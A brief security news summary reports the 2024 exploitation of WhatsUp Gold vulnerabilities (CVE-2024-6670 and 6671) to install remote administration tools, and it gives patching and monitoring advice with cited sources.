Malicious actors have been exploiting critical vulnerabilities in Progress Software WhatsUp Gold since August 30, 2024, leading to potential ransomware attacks and the installation of remote administration tools on Windows hosts.
Description
Attacks on WhatsUp Gold began shortly after a proof-of-concept (PoC) for CVE-2024-6670 was made public [4], targeting vulnerabilities with a CVSS score of 9.8 [2]. These vulnerabilities, specifically CVE-2024-6670 and CVE-2024-6671 [1] [2], allow attackers to retrieve encrypted passwords via SQL injection in single-user configurations [2]. The attacks involve bypassing authentication to exploit the Active Monitor PowerShell Script within the NmPoller.exe process [3] [6] [7], enabling the installation of remote administration tools like Atera Agent [2], Radmin RAT [2], SimpleHelp Remote access [2] [3] [6] [7], and Splashtop Remote for persistence on Windows hosts. Trend Micro researchers have observed potential ransomware actor involvement in these attacks. A security patch addressing both CVE-2024-4885 and CVE-2024-6670 was released on August 16, 2024 [2]. This is the second instance of vulnerabilities in WhatsUp Gold being actively weaponized [3] [6] [7], with a previous exploitation attempt against CVE-2024-4885 [3] [7]. Additionally, Trend Micro has reported exploitation of a patched security flaw in Atlassian Confluence to deliver the Godzilla web shell [7]. Despite patch availability [1], some organizations were slow to apply them [1] [6], leading to incidents shortly after a PoC was published [1]. Mitigation measures include restricting access to corporate services [1], promptly applying patches [1], and monitoring for suspicious process creation events in WhatsUp Gold environments to prevent similar attacks [1]. Security teams should monitor for unusual process creation events and downloads from suspicious URLs to detect potential compromises [5]. Trend Micro recommends immediate action to protect against these critical vulnerabilities [5].
Conclusion
The exploitation of vulnerabilities in WhatsUp Gold and Atlassian Confluence highlights the importance of prompt patching and monitoring for suspicious activities to prevent potential compromises. Organizations should take immediate action to protect against these critical vulnerabilities and safeguard their systems from malicious attacks.
References
[1] https://www.trendmicro.com/en_us/research/24/i/whatsup-gold-rce.html
[2] https://cybersecuritynews.com/hackers-exploit-whatsup-rce-vulnerability/
[3] https://thecyberpost.com/news/hackers/progress-whatsup-gold-exploited-just-hours-after-poc-release-for-critical-flaw/
[4] https://www.krofeksecurity.com/breaking-whatsup-gold-vulnerability-critical-exploit-reported-hours-after-poc-release/
[5] https://securityonline.info/whatsup-gold-under-attack-new-rce-vulnerabilities-exploited/
[6] https://vulners.com/thn/THN:05EC256E6F360D0F47176ABF405F791D
[7] https://thehackernews.com/2024/09/progress-whatsup-gold-exploited-just.html